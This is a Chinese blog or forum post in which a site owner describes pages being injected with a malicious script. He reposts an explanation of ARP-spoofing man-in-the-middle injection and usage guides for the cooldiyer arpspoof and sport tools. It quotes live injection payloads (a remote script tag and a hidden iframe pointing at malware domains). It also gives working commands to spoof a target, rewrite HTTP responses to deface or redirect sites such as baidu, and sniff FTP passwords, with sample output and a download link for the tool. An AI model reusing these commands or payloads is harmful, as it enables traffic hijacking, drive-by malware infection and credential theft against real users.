刚一上线 兼职报社的人问我 站怎么打开很慢 我自己马上打开,很快(因为公司带宽超好) 后来才发现首页调用全部显示不出来 赶紧进FTP,才发现全部被挂马了。。。
给空间商发消息 因同网段有IP中毒,导致ARP欺骗,VLAN挂马,故现停止W2,W3,W5,H1服务器,等解决后恢复。
以下转自落伍 服务器IIS上所有的HTML ASP ASPX 都被挂马。
 程序代码
<script src=http://waigua9999.com/1.js></script>
在每个文件的头部加了如上代码。
源代码没有挂马内容。
IIS中ISAPI和重定向及域名,均没有发现异常。
会不会是路由劫持呢??
http://61.130.XXX.170/ http://61.130.XXX.172/ http://61.130.XXX.130/ 三台机器都出现了相同的情况。
现在的例外情况是:
我用172服务器访问170,就没有问题
所以现在估计是服务器输出流没有问题,是机房输出时经过路由加上去的。
机房电话找不到了,现在联系不上。郁闷。
------------------------附如下文章。。。
47555病毒 arp挂马 原理剖析
最近这种病毒比较流行,在网上看到不少网友说自己的机器出现了类似的情况,就搜集了一些资料,希望对大家有帮助。
现象:不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入 <iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>,挂马的位置在html标记左右,上面这段恶意代码,它会每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器,格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况。
首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是title的地方,用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常,而且这个插入的代码有的时候出现有的时候不出现,说明不是网站的问题了.打开同服务器的其他网站也有这个情况发生,而且状况一一样.检查并且搜索挂马的关键字之后确定不是网站程序的问题.
那么剩下的要么是IIS自己出了问题,要么是网络的问题,因为数据是处理没有问题(这个由程序输出,而且即使是html都会出问题),经过一个一个排查,最后基本可以确定就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的).
目的:通过arp欺骗来直接挂马 优点:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码. 但这样存在局限性: 1.管理员经常不登陆,那么要很久才能监听到密码 2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.
优点: 1.可以不用获得目标主机的权限就可以直接在上面挂马 2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句. 3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.
原理:arp中间人攻击,实际上相当于做了一次代理。
正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机 arp中间人攻击时候: A---->C---->B B---->C---->A 实际上,C在这里做了一次代理的作用
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.
什么是ARP?
英文原义:Address Resolution Protocol 中文释义:(RFC-826)地址解析协议 局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在 发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址以保证通信的顺利进行。
注解:简单地说,ARP协议主要负责将局域网中的32为IP地址转换为对应的48位物理地址,即网卡的MAC地址,比如IP地址为192.168.0.1网卡MAC地址为00-03-0F-FD-1D-2B。整个转换过程是一台主机先向目标主机发送包含IP地址信息的广播数据包,即ARP请求,然后目标主机向该主机发送一个含有IP地址和MAC地址数据包,通过MAC地址两个主机就可以实现数据传输了。
应用:在安装了以太网网络适配器的计算机中都有专门的ARP缓存,包含一个或多个表,用于保存IP地址以及经过解析的MAC地址。在Windows中要查看或者修改ARP缓存中的信息,可以使用arp命令来完成,比如在Windows XP的命令提示符窗口中键入“arp -a”或“arp -g”可以查看ARP缓存中的内容;键入“arp -d IPaddress”表示删除指定的IP地址项(IPaddress表示IP地址)。arp命令的其他用法可以键入“arp /?”查看到。
解决方案如下:
联系机房,用拨网线的排除法,找出同路由内中了类似47555病毒的机器,隔离。杀毒。
其他机器,遇到这种情况,重装系统是没用的。
去了趟机房发现: 很多人在忙着。已经乱套了,好几个大客户在跟进中。
中国化工网,钱塘在线等知名网站,都在里面。
arpspoof 3.1b正式发布
主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击 说明: 本程序公开源代码,为了换取更多朋友的指教
实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释) 效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。 图解: __________________________________________________________________________________ F:\arpspoof\Release>arpspoof /n ARPSpoof 3.1b by CoolDiyer 06-10-30 [+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定
F:\arpspoof\Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt ARPSpoof 3.1b by CoolDiyer 06-10-30 Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
Parsing rul <HEA ==> Hack by cooldiyer<noframes> [+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包 [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是 [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
Forwarding untouched packet of size 62 [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
Forwarding untouched packet of size 60 [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
Forwarding untouched packet of size 399 [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
Forwarding untouched packet of size 60 [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。 Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”
Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的) [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
Forwarding untouched packet of size 1474 [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
Forwarding untouched packet of size 60 [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
Forwarding untouched packet of size 237 [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
Forwarding untouched packet of size 60 [+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存 [-] Sleep 5s ............ # 5秒退出 __________________________________________________________________________________
其它说明: arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log 可保存数据到文件, arpspoof 192.168.0.1 192.168.0.108 80 2 1 只显示数据 被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt 需要说的是程序在公网下照样使用,我已经解说过了,不再举例......... 规则文件的使用可以看程序的书写,本程序开放源代码
点击下载 http://201314.free.fr/attachments/200612/arpspoof.3.1.zip
基于arp欺骗的端口劫持工具(sport) 和会话修改工具(arspoof)
第一个: sport.exe _______________________________________________________ 适应环境:Lan + Switch sport.exe (VC++ 6.0 && Winpcap 3.1 && UPX Release) 17KB
ARP portspoof Ver 1.0 by cooldiyer Usage: sport <Target> <IP1> <port> <IP2> <port> <AdpNum> sport /l _______________________________________________________
sport /l 列出网卡
假定baidu.com的IP为220.181.18.114, 要欺骗的IP为192.168.0.12,网卡ID为2 这时要想让192.168.0.12访问百度的时候数据转发到别的网站,可用如下命令
转到202.107.5.23 的81端口上 (你架好的网马) 网卡ID为2
sport 192.168.0.12 220.181.18.114 80 202.107.5.23 81 2
这时192.168.0.12访问baidu的时候返回的数据就是202.107.5.23的81端口上返回的信息
也可以转到局域网其它主机上,如
sport 192.168.0.12 220.181.18.114 80 192.168.0.100 8080 2
还可以转到自己上面,假定自身IP为192.168.0.18,架个web服务器,端口为81
sport 192.168.0.12 220.181.18.114 80 192.168.0.18 81 2
192.168.0.12访问百度时出来的就是你自己web服务上的页面
因为程序基于ARP欺骗,所以Target也就是受骗主机必须与你一个网段 还有就是不能欺骗网关(因为危害性过大,程序略去这段代码)
这些功能,可以用来做内网渗透,加上社会工程学,能做很多想不到的事情 _________________________________________________________________________________
第二个: arpspoof.exe _______________________________________________________ 适应环境:Lan + Switch sport.exe (VC++ 6.0 && Winpcap 3.1 && UPX Release) 19.5KB
ArpSpoof Ver 3.1 by CoolDiyer Usage: ArpSpoof <IP1> <IP2> <PORT> <AdpNum> <Mode> <JobFile> ArpSpoof /l Mode Options: 0 IP1 --> IP2 1 IP1 <-> IP2 Examples: > ArpSpoof 192.168.0.1 192.168.0.8 80 2 1 job.txt #Spoof 192.168.0.1 <-> 192.168.0.8
> ArpSpoof 192.168.0.1 192.168.0.8 80 2 0 /RESET #Reset 192.168.0.1 --> 192.168.0.8
> ArpSpoof /l #Lists Adapters
> ArpSpoof /n #Release a new replace job file _______________________________________________________
程序实现的功能就是ARPSpoof欺骗转发数据包的同时修改数据,加入恶意代码 (可用在公网上)
arpspoof /l 列出网卡ID
注意JobFile里面内容格式如下(可以用arpspoof /n新建一个任务文件)
---- <hea ---- Hack by cooldiyer<noframes> ---- <HEA ---- Hack by cooldiyer<noframes>
懂超文本的可以一下子就看出来什么意思了,就是把'<hea'换成'Hack by cooldiyer<noframes>'这样的话,网页就只显示了'Hack by cooldiyer',因为<noframes>标签屏蔽了它后面所有的标签,这招绝吧,呵呵 程序把它'----'当做分隔符,从第一个分隔符开始,第一个是要替换的旧字符串,第二个分隔符下是要替换成的新字串,不能换行 依次下去,第三个分隔符又是一个要替换的旧字符串,第四个又是一个要替换成的新字串,依次类摊,可以无限添加,不过越少越好,因为多了程序吃不消的
下面说攻击实例
1:外网攻击实例
比如baidu主机为220.181.18.114,你有这个网段随意一台主机的最高权限比如220.181.18.9,网关为220.181.18.1 你就可以黑百度了,网卡ID为2,只更改百度到网关的数据就够了,job.txt 用 arpspoof /n生成,命令如下 arpspoof 220.181.18.1 220.181.18.114 80 2 0 job.txt 这样,其它人访问百度时候就只看到一行字'Hack by cooldiyer',当然你也可以更改其它数据用做别的用途
2:内网攻击实例 道理一样,你想让192.168.0.100访问百度时看到一个被黑的页面,网关为192.168.0.1,其它默认,执行命令如下: arpspoof 192.168.0.1 192.168.0.100 80 2 0 job.txt 它访问百度里就看到被黑页面了,当然你也可以改写成其它的代码
3: 数据嗅探,呵呵,基本的功能,如果参数后面不跟任务文件的话,程序就是把指定端口的数据给显示出来如,嗅探FTP密码
arpspoof 202.103.248.1 202.103.248.100 21 2 1
程序会自动把嗅探到的21端口的数据给显示出来
临时防御: ARP防火墙单机版4.0.1,03月12日发布,原名Anti ARP Sniffer,采用全新系统内核层拦截技术,能彻底解决所有ARP攻击带来的问题,能够保证在受到ARP攻击时网络仍然正常,能彻底解决在受到攻击时出现的丢包现象。能自动拦截并防御各类ARP攻击程序、ARP病毒、ARP木马、通过智能分析抑制所有ARP恶意程序发送虚假数据包。自动识别ARP攻击数据类型:外部攻击、IP冲突、对外攻击数据,并详细记录所有可疑数据包并追踪攻击者,软件能自动统计ARP广播包发送接受数量。作者授权发布。
下载: http://www.hackerdown.com/down.asp?id=25&no=1
|